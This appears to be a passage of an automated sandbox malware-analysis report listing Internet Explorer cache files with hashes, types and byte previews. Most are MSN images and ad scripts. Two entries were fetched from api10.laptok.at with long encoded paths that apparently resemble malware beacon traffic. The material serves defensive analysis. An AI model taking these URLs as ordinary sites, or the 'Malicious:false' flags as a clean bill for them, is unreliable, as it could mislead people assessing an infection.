Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 311x333, frames 3
Category:downloaded
Size (bytes):8350
Entropy (8bit):7.897208894805599
Encrypted:false
SSDEEP:192:BYSiZnL/KLEKkBAuFiRIrdAAz82Aq8Ris2lqmiV3:eveAKkqRIhAAzRB8pv
MD5:E34FC5F484E7C8FD39064AB5EDD2EF06
SHA1:34027795AF4B636A2CD1251B4343C8B5AD7E2F23
SHA-256:17B170C203AA5C0459305776F421B31BBC37DCB48009B8637A59B1AAEEC39F94
SHA-512:5CE743153685A6B3A7007B00C53785047A3D40673D573DC95AD0E9A800480B7A18DF306409E8D757EE7146EABE3C44C403EFD075C1C42A3C2A9D59E1D57FC334
Malicious:false
IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dHpQ8.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview: ......JFIF.....,.,.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..3...h&...K..M.h..isQ..)j..4....@.f..ih.sK.e......Q.K...R..u(z.KHi.AM.3J..)...h...\.R.I.V.41[4...w_j.6..y...0h.....&OG5.5sZ].......*.k..G.(.M..*...OZd.b.m*.F...f....Z..S).e..S.S.HMf.D$ToS5A%C4EY..*ij,.-.ZB..SI....w..?1..X....(.L.:.......9G4....Q.S.......w.....R...ZJ3@.M0.9.D....SM..Hd...tf...N#r.)..m...V..).(a...^%..,.pB.I-l6.8.rQ..p..V~ids$...&.^.]..&Z..R).
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\BB1dHrmf[1].jpg
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):21299
                                                                                                                                                                                                    Entropy (8bit):7.9570805579779
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:egZn95jlaxoDLrizXmGzct0MFWBuKJjVZ6S43kKrApmqjRGc:egZnNnDLrizPzctGoKjVZ6S43PLKGc
                                                                                                                                                                                                    MD5:3DBFB59A536D2D2269550A39A06A4652
                                                                                                                                                                                                    SHA1:5FE1BE0F31A31E196D5A767527439A6C05544ED1
                                                                                                                                                                                                    SHA-256:5E8C035CDB872282E3EA3C0BDBE6DE635747C289A7892EFB433DF58260C30A3C
                                                                                                                                                                                                    SHA-512:0FB3A56338B51E971D8CF5B7B825198B994DED2DB0AD1E581DB35462299274D06B63FECBE1D6488DD630B68E4D03A3396FC8C5A0858C697134B1F588343D9D4E
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dHrmf.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg
                                                                                                                                                                                                    Preview: ......JFIF.....`.`.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..r..Q.w..+.X.X........oE.z...[.....^..).(JF.I....j......RMm..xf<Ts.........Z.....xwF...q.5..1.....R..Pr..RK......N.3..)"1.{.&..Us...3I..R..s.u'.C....}j.$.@...;V_.. ..+.....P...T..O.k.....vh......rO..W.;I;.,M$...dv.Z.]..K....s.Q...R...$2...@!.Q.V..d7...Y.hq&.|.;{.k.ap..T..v..d...l...T7r..\...&.1...Z..7h@..=}kv.....#P......-.Gr...n.G|.[..IT.+.8..?J..i.TJZ.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\BB1dHsRM[1].jpg
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 100x75, frames 3
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):2391
                                                                                                                                                                                                    Entropy (8bit):7.79733578579855
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:BI/XAo0XxDuLHeOWXG4OZ7DAJuLHenX3fbim8AKO+gaSFDhJoT40K8QkVl5sg0en:BGpuERAdbim38gaSmV+eiYCIYgywhLx
                                                                                                                                                                                                    MD5:35BA498D68E7C240DF270DEB903297F5
                                                                                                                                                                                                    SHA1:D176ED7960CA277AE94002419C7C9CE6F78FFA01
                                                                                                                                                                                                    SHA-256:5D3665DDEDEED5CAA21D484E09138796B8FFA9D9BCABBFEB66EF8BCC8C72D82A
                                                                                                                                                                                                    SHA-512:409A81491F9210B0F2B7C9360EA052EE49850AA3177922527094D0DF3B2C66221AF4F72ABB4585B99B427F9957FBB09D3AE717020C08F781E8248B019DB82745
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dHsRM.img?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                                                                                                                                                                                                    Preview: ......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......K.d.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...er.....mko.v..\W.9+..W..B.@.$..5.%s...N..7..@!V.d..2L.>MS.Z,...B.n.<Ii#.......W#..^88.......Dx.$..M(.$......V..hr..I..p.4..)..208.T...k.o..8.k@..!......Z..K.T.UUz..g.z..m(.7_S.]...d!...`.....9..ku.%..2.8......K..../.@....d.-.=....q..Z...T.s.N..Z.."".pk..h.r.>a.3EbjW2...8.....y..c.....}.X.8....?Z.c4EB..w.s.P.[...d..Q..k-...c.].8......t.c..9...=+.......p.'Q..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\BB1dHw7A[1].jpg
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):6904
                                                                                                                                                                                                    Entropy (8bit):7.929723133358109
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:BCLVjHcLfXUn0xZl9nGOhtxch6szXTVP/PhxPj37J:kLNOfknqZvnG4Xch6szpfHnJ
                                                                                                                                                                                                    MD5:2D49B699C2E959616F35A1ECB1AB6AD0
                                                                                                                                                                                                    SHA1:624ADCD53D2A415E501F7D686B1EF6B2C834524C
                                                                                                                                                                                                    SHA-256:4DFF9E6C263AEB667FD6CFDEBA59C5EBB8FF1F68A08DFF335ADB7A3A180EF420
                                                                                                                                                                                                    SHA-512:C2A7F76A7FFE606E557899A9F136A3A5EF3B2777BB4A3FDCD95D095F176B5B0C1D755BAD20AA7C4A2202645144FCBCA401142BE26BB3F2955E16BCFFF4DBC6E2
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dHw7A.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jpg&x=1800&y=1040
                                                                                                                                                                                                    Preview: ......JFIF.....,.,.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...M.N{U.........6{P-}.TB).H..`..-}......K..,.3>..G..I.#B.B..Mc\..D.c....N3U.n[...N...6....c.w4...P...W.....H......,Rd".wv...#.....,........X]5;!......h...[.psH`aX...k..7P.."!....y#..5.C..K..W.......0.L*.k.C.x..gc..f.W..zUg...X.C.JR.....a4.L4..i7Pi.. jvj.iCR.l..F.8.`v@S...N..3...)..4.....ZYX* .4...).i...y.(.N..8....sI#..u..VT9...t....$...r.#..Vl.>.y.8..,J.v..I.F.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\BB1dHwnn[1].jpg
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 310x166, frames 3
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):9913
                                                                                                                                                                                                    Entropy (8bit):7.938614065414203
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:BFKQJBXv5zhehwOTpC9Y80w7KLbgc3/h8fH//1JuAhbC/:vbj/0wset7FcvhuHXOabC/
                                                                                                                                                                                                    MD5:9C3CE6FEB1E697660064FE30919EDE39
                                                                                                                                                                                                    SHA1:CEB38604F283FA618793E718539652CE42550499
                                                                                                                                                                                                    SHA-256:B7CA13319F1463E66EC50C47FE75C11CCF4743A9468313D3483F6FD9183D6246
                                                                                                                                                                                                    SHA-512:44755BF05B03F9F31AAA527139574FDC9346550026E488E60A4125A3296BE4D96F5D9B626CDBD917E16D5B1BFB078954C973CE3193020FC27E5A4FFA93B2DB08
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dHwnn.img?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jpg&x=2141&y=1483
                                                                                                                                                                                                    Preview: ......JFIF.....`.`.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........6.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...*...:.a...*.>...F?....q......F.$.. ..W....c..^..3....0._..f........&.C6..R.q...B.K.}.k..L.(.I.UkWS.Y...m..N.Z[I..X...K...#..Z..NmR..V..p.sT....3....J.\q.....o .$1..@..U.u.?..6........a...."....+N....w..?..I.Y2....\.U.$ch..Q.F:....]..qK....2O.S......]..,i...l.! ..'.._\}...Dn<H.....o..p./L..Qv.{.U....c..=.B.U.B....F.....:.T....ZzE......i...@.Ne.n.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\BB1dHz8t[1].jpg
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):8696
                                                                                                                                                                                                    Entropy (8bit):7.945865627744297
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:BCjdmdhDcRa/jzYYFOa3GTsEcnGMBrMVPJV8Wz4KqRBkZqy:kjSDcGznF/GYEcnGHR8Wz4ZBkZ7
                                                                                                                                                                                                    MD5:C0F54ECA7E3D3D9B53BFD33580477F00
                                                                                                                                                                                                    SHA1:411596FDBDCE19C789173796B50F2DB0CA82BB9D
                                                                                                                                                                                                    SHA-256:4A447C9CF36D9353CD9829C026CF65D40887598E2BD9363FB8687ACEB75EA301
                                                                                                                                                                                                    SHA-512:69D8318EA41FEA469E764FF3039D516FE9AFAB05B466B6CE4D958467DDABB21C97DA491D809CDA26FC10FA77C3E9F51E1B93768C6CA4012AD91AC7D6332D44F3
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dHz8t.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jpg&x=540&y=675
                                                                                                                                                                                                    Preview: ......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..tj...uj.Z.d..AJ)....I.!....)...f....J...+..=....p.5.].1...N.2.8..s...w41".r-.y.?..CU/c0_M..X...jmNe.Hg..x...]..........].... ..Q..+z.H....^...*n7.=x.c.'..*..Oj.18.P.23.O..}..~...KFVE...#..U6..S...[..i&_.|.q....dm..K..M.....Sm..$1..:.y.:c.:1.).v5.W.tn;.ZQ...Uya.7/Z..0.....eFN{.#@...R+zU`.S.H..i....Ez`OKMS.O17..7u.z.....n..V..P.$`F+.&P.pGj..wB.63..lO.:...P4r
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\BB1dHzhh[1].jpg
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 100x75, frames 3
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):2042
                                                                                                                                                                                                    Entropy (8bit):7.7588225060907305
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:BGpuERAKXDOsuAwWN5uNfxe/es7wsNrbuBWkySY:BGAEdzOwvsxe/ecwslKBWkySY
                                                                                                                                                                                                    MD5:5EE9D1E088E4DB3DCA9268C50F813456
                                                                                                                                                                                                    SHA1:B90144849695735A641F0BA7F25C318C75F06DF6
                                                                                                                                                                                                    SHA-256:42E7748A909E4D0670B965AE9EC99C91D5A0A22B6115C1967962C6CF44F79D67
                                                                                                                                                                                                    SHA-512:9361DCD399A1E6255EB77FE833A452378C84481894D670A3EF93775E736CE505CAE3117603E789D7BD8EFF8721331F3D85162D6BD8D2B41329C996979E96A097
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dHzhh.img?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                                                                                                                                                                                                    Preview: ......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......K.d.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...1K... ..."...)Q.GTE,.p..i*[Y..S(.....I..........9...8.ST.|7.....k76.|..u.....2.s|$.)!....8......~]9^+......(\.~...Q\..d.-KQ8Z+{.ZTzV....\(..t.{~y......,(."....Q@.......0y `...PV.&..&.z2....K...D|..2..SJ.B..dT......4).@OL.[.I..Wu.c~.KR.[:\H.IS..B=Gq.].....D....`&.T..#.......G.n....W...............5.I+...\.<Sxfk+F9k8.D..8...+..|A.O.."......FO|..KN...Q.l-d.g..
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\BBY7ARN[1].png
Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:downloaded
Size (bytes):778
Entropy (8bit):7.591554400063189
Encrypted:false
SSDEEP:12:6v/78/W/6TiO53VscuiflpvROsc13pPaOSuTJ8nKB8P9FekVA7WMZQ4CbAyvK0A:U/6WO5Fs2dBRGQOdl8Y8PHVA7DQ4CbX0
MD5:7AEA772CD72970BB1C6EBCED8F2B3431
SHA1:CB677B46C48684596953100348C24FFEF8DC4416
SHA-256:FA59A5A8327DB116241771AFCD106B8B301B10DBBCB8F636003B121D7500DF32
SHA-512:E245EF217FA451774B6071562C202CA2D4ACF7FC176C83A76CCA0A5860416C5AA31B1093528BF55E87DE6B5C03C5C2C9518AB6BF5AA171EC658EC74818E8AB2E
Malicious:false
IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBY7ARN.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\F[1].htm
Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:ASCII text, with very long lines, with no line terminators
Category:downloaded
Size (bytes):270440
Entropy (8bit):5.999927116066864
Encrypted:false
SSDEEP:6144:Y+0C7j1OHxuaO32a5uF6e/jwm+JBJk18h++os7c2Wq/:YQ9Oc35663Xxb157cI/
MD5:E924EC561FB47C3C0077569F989E9945
SHA1:7B779431CDFB4199AB382029420C49A8E7145CBD
SHA-256:620F9E87417B9B64C9CA5D8C86EADC68BE4EFBCD4F829857AA3E88CBCF8FFCEA
SHA-512:61258962ADD49591F56ADE96442EF93067AB937903798757CE620AE1B6A7E05FCB4703A3CC25764A71963BC848E9924B20631A88511E48F0C93BF24AA079941A
Malicious:false
IE Cache URL:http://api10.laptok.at/api1/QSqnACLeyr6hdgRM/z5FskeEfxxW4Q1R/GsITkxgk46HCnUm5Kd/11eB4QB_2/FS2OIfou_2BVahhCN2i1/lN05g44fSdWuZ34SVM_/2F18tQh3ZP_2B9CZltVRIM/NAJawsHjH4mX4/XILaVciO/5e8TUIFZ7ccd8Dn_2F8wtDN/DA_2BihyHs/BqbIiQ7x5yFYJOUsg/scHsHuDvL_2F/a38zFWCcfG3/xo4sCKeZx_2FgB/qzrd3KTzhXtd1iKJfTVBW/TIaj2x4Rf3CB0n8w/wlBMav7PHwJXLsZ/IliJcWNYhk60Yrdjmm/3OHtbL5dY/ANYcc2W_2Bf_2FIiYenV/jXNvqJX5m02G5/F
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\SDOEEBL[1].htm
Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:ASCII text, with very long lines, with no line terminators
Category:downloaded
Size (bytes):2464
Entropy (8bit):5.985101502504591
Encrypted:false
SSDEEP:48:IwgrwffRMN+4xpihcoAtmdydQ+nR4z3Swa0FUBmmX3Aw6Ixt6iMibzuM8WyVN:Iwgk3RFutmKQi4r1kHAwjxpV2M8L
MD5:A214C9D621F37A4A5DD418FE4B986283
SHA1:96B4D5DED9599F50A7557A927384A054721496C6
SHA-256:A63A214D997D6A6B91E278F99EE16E9EDD06ABC4C515797838E22B8E59C96784
SHA-512:9D7F21113869653138AF6DE31ED741CC17EA7C5FD0EA2540290AB31B1730E77D0226C0565328466B7A578074F4793EAE14E881E69D7C2F8D5D354A130E97779E
Malicious:false
IE Cache URL:http://api10.laptok.at/api1/aE3Chvy15YwtGBM5c3w/ZiymrrSsY1vMIEeQ79sLxc/QkfYDB83GeV6h/wfm_2Fba/IxaOhm6BSIFzHirA83QDIG_/2FbmOJUxF8/ud5_2Fql9hZq1SzAT/Mwor9Yan0pTL/Fp7ZNYW1P4i/kA3p_2Ft9A_2Fs/RuUNpyL5CsQBX14_2BDvT/1fDvmlCtb0dss45p/clOsmGOkIAiGzqR/LxhkYHtCoZLc014ID_/2BtL4MOOe/oIJGNpJMiO7LF1VXD1cY/3TSy0R_2FzpOndwhSFh/jEmLA5uqXYEdrQwipf8a_2/FYxkdf4zOPfe0/vr4tnHHd/_2Fh2Azy7z8mKYRQWXwGF6y/SDOEEBL
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\a5ea21[1].ico
Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced
Category:downloaded
Size (bytes):758
Entropy (8bit):7.432323547387593
Encrypted:false
SSDEEP:12:6v/792/6TCfasyRmQ/iyzH48qyNkWCj7ev50C5qABOTo+CGB++yg43qX4b9uTmMI:F/6easyD/iCHLSWWqyCoTTdTc+yhaX4v
MD5:84CC977D0EB148166481B01D8418E375
SHA1:00E2461BCD67D7BA511DB230415000AEFBD30D2D
SHA-256:BBF8DA37D92138CC08FFEEC8E3379C334988D5AE99F4415579999BFBBB57A66C
SHA-512:F47A507077F9173FB07EC200C2677BA5F783D645BE100F12EFE71F701A74272A98E853C4FAB63740D685853935D545730992D0004C9D2FE8E1965445CAB509C3
Malicious:false
IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\auction[1].htm
Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:HTML document, ASCII text, with very long lines
Category:downloaded
Size (bytes):25609
Entropy (8bit):5.673363269670742
Encrypted:false
SSDEEP:384:oe8fTppmzAmeaTizhIbD+TLpWAANHcORGGhdcYOSUjNENQacDsC7kDCyGR2+Gl0P:4j3If9n0LP7GurPBJ
MD5:16137394EB177AD5845EE55D9070C3F4
SHA1:9F935ED4450B7ED81ABCE507517D9FDEAB5F6DCB
SHA-256:FBFAD5303DC9698B197A191C5638AE07DFE61CEDE6172781A15AB1960207A5AB
SHA-512:B6BAC4FA9303E94E23CD20CFFEC1F5FE0EC3301F6404EE04F94E33BFC3A91DDF4B5275BD4EC0E1866EFD694A4B02C077A5190C39B4003C876CE98E3C3132D410
Malicious:false
IE Cache URL:https://srtb.msn.com/auction?a=de-ch&b=58c0ab91b2274dd0a3125e72ecbebee4&c=MSN&d=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&e=HP&f=0&g=homepage&h=&j=0&k=0&l=&m=0&n=infopane%7C3%2C11%2C15&o=&p=init&q=&r=&s=1&t=&u=0&v=0&x=&w=&_=1613453168955
Preview: .<script id="sam-metadata" type="text/html" data-json="{&quot;optout&quot;:{&quot;msaOptOut&quot;:false,&quot;browserOptOut&quot;:false},&quot;taboola&quot;:{&quot;sessionId&quot;:&quot;v2_580a42467b0069fb733cee8c54794e40_31b0e660-389e-4dc2-8256-ee4f350c7fbd-tuct7245e67_1613420775_1613420775_CIi3jgYQr4c_GM3T9YCT6NexOiABKAEwKziy0A1A0IgQSN7Y2QNQ____________AVgAYABoopyqvanCqcmOAQ&quot;},&quot;tbsessionid&quot;:&quot;v2_580a42467b0069fb733cee8c54794e40_31b0e660-389e-4dc2-8256-ee4f350c7fbd-tuct7245e67_1613420775_1613420775_CIi3jgYQr4c_GM3T9YCT6NexOiABKAEwKziy0A1A0IgQSN7Y2QNQ____________AVgAYABoopyqvanCqcmOAQ&quot;,&quot;pageViewId&quot;:&quot;58c0ab91b2274dd0a3125e72ecbebee4&quot;,&quot;RequestLevelBeaconUrls&quot;:[]}">.</script>.<li class="triptych serversidenativead hasimage " data-json="{&quot;tvb&quot;:[],&quot;trb&quot;:[],&quot;tjb&quot;:[],&quot;p&quot;:&quot;taboola&quot;,&quot;e&quot;:true}" data-provider="taboola" data-ad-region="infopane" data-ad-index="3" data-viewability="">.<
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\f489d89a-0e50-4a68-82ea-aa78359a514f[1].jpg
Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, frames 3
Category:downloaded
Size (bytes):71729
Entropy (8bit):7.978138681966507
Encrypted:false
SSDEEP:1536:m1xQuEXuHILYJ422E/mUx04VrG0tPZuL76T3:8QeoLYbR1VrG0tPMLq3
MD5:CF11BAF2E1D8672BBE46055C034BAE56
SHA1:7305B5298E7EFE304F11C4531A58D40ECD4EA99D
SHA-256:2F7B151005B4E02B04116E540BE590E8C838B5CFE947358993DE63880520D10E
SHA-512:646219C6D6FDDDDE4FD6B00B98C3EA10E33A182A39852011CAA2CBDADB2FAB4517950E3F6E972119435B4C18A823F6F1B38E74B6EC19F9ACF49D1EDB7096111D
Malicious:false
IE Cache URL:https://cvision.media.net/new/300x300/2/99/84/174/f489d89a-0e50-4a68-82ea-aa78359a514f.jpg?v=9
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\log[1].gif
Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:GIF image data, version 89a, 1 x 1
Category:dropped
Size (bytes):35
Entropy (8bit):3.081640248790488
Encrypted:false
SSDEEP:3:CUnl/RCXknEn:/wknEn
MD5:349909CE1E0BC971D452284590236B09
SHA1:ADFC01F8A9DE68B9B27E6F98A68737C162167066
SHA-256:796C46EC10BC9105545F6F90D51593921B69956BD9087EB72BEE83F40AD86F90
SHA-512:18115C1109E5F6B67954A5FF697E33C57F749EF877D51AA01A669A218B73B479CFE4A4942E65E3A9C3E28AE6D8A467D07D137D47ECE072881001CA5F5736B9CC
Malicious:false
Preview: GIF89a.............,........@..L..;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\medianet[1].htm
Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:HTML document, ASCII text, with very long lines
Category:downloaded
Size (bytes):384616
Entropy (8bit):5.484045335388313
Encrypted:false
SSDEEP:6144:4mQ9Tw5qIZvbzH0m9ZnGQVvgz5RCu1bJx6Sv7IW:EIZvvPnGQVvgnxVr607IW
MD5:6993D214E56D325FE95EED908E99117B
SHA1:39242254F48F531EC330C9FE7D7849C990F60F85
SHA-256:2FC860C5345300292341E51A99A178ADE7132D6BE27A19FFEBC99CA94109736A
SHA-512:73EF29FA710A090BC72E149CE565A24DA081A266D0D3112727D07E3BB602BACD5371065CA76C5228737521689F852B2AC6813FA81153BEED27C1AA1D602D76F5
Malicious:false
IE Cache URL:https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Preview: <html>.<head></head>.<body style="margin: 0px; padding: 0px; background-color: transparent;">.<script language="javascript" type="text/javascript">window.mnjs=window.mnjs||{},window.mnjs.ERP=window.mnjs.ERP||function(){"use strict";for(var a="",l="",c="",f={},u=encodeURIComponent(navigator.userAgent),g=[],e=0;e<3;e++)g[e]=[];function m(e){void 0===e.logLevel&&(e={logLevel:3,errorVal:e}),3<=e.logLevel&&g[e.logLevel-1].push(e)}function n(){var e=0;for(s=0;s<3;s++)e+=g[s].length;if(0!==e){for(var n,o=new Image,t=f.lurl||"https://lg3-a.akamaihd.net/nerrping.php",r="",i=0,s=2;0<=s;s--){for(e=g[s].length,0;0<e;){if(n=1===s?g[s][0]:{logLevel:g[s][0].logLevel,errorVal:{name:g[s][0].errorVal.name,type:a,svr:l,servname:c,message:g[s][0].errorVal.message,line:g[s][0].errorVal.lineNumber,description:g[s][0].errorVal.description,stack:g[s][0].errorVal.stack}},n=n,!((n="object"!=typeof JSON||"function"!=typeof JSON.stringify?"JSON IS NOT SUPPORTED":JSON.stringify(n)).length+r.length<=1

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\medianet[2].htm
Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:HTML document, ASCII text, with very long lines
Category:downloaded
Size (bytes):384615
Entropy (8bit):5.484035860865757
Encrypted:false
SSDEEP:6144:4mQ9Tw5qIZvbzH0m9ZnGQVvgz5RCu1bZx6Sv7IW:EIZvvPnGQVvgnxVb607IW
MD5:CB9035769E03E987B06381F4D5F87955
SHA1:159727D6B1FD10F4678C84512F16937C5EFB46F2
